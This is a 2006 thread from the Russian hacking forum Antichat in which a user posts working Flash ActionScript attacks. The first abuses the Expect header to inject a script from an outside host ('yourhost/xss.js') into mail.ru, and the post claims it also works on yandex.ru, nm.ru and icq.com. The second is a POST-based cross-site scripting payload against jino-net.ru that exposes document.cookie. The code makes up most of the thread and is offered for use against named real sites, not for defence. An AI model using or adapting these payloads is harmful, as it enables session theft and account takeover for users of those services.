Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Xss на mail.ru через expect заголовок. (https://forum.antichat.xyz/showthread.php?t=25482)

Go0o$E 16.10.2006 19:56
Xss на mail.ru через expect заголовок.
 
Для проведения атаки я буду использовать Flash (ActionScript). Ну и естественно нам понадобится программа для создания Flash и у меня это будет Macromedia Flash MX.
Создание Flash:

http://f.foto.radikal.ru/0610/329d56f4fb55t.jpg

PHP код:
var req:LoadVars=new LoadVars(); 
req.addRequestHeader("Expect","<script src=http://yourhost/xss.js></script>"); 
req.decode("XSS"); 
req.send("http://www.mail.ru","POST"); 
Этот ActionScript работает на IE и Firefox, в Opera просто открывается mail.ru.

Уменьшаем размер и экспортируем Flash: File->Export->Export Image.



http://c.foto.radikal.ru/0610/e9816fa10677t.jpg

Вот в принципе и все. Думаю вы знаете что дальше делать.

P.S. Еще работает на yandex.ru, nm.ru и icq.com.

Sn@k3 16.10.2006 21:10
гыгыгы опера пелеплюнула фаерворкс =) А так метод уже рассматривался и я удивлен, почему же так редко упоминается, ведь пока что тема реально работает. оч рад +

Go0o$E 16.10.2006 21:22
Да уязвимость не нова, но работает еще много где! =)

Go0o$E 20.10.2006 23:30
Post Xss на jino-net.ru
 
Так же на actionscript можно проводить xss через post запросы.

Пример: XSS на jino-net.ru

PHP код:
var req:LoadVars=new LoadVars();  
req.decode("subject=spam&name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=&message="); 
req.send("http://www.jino-net.ru/contacts.phtml?subj=spam","POST"); 


Время: 17:49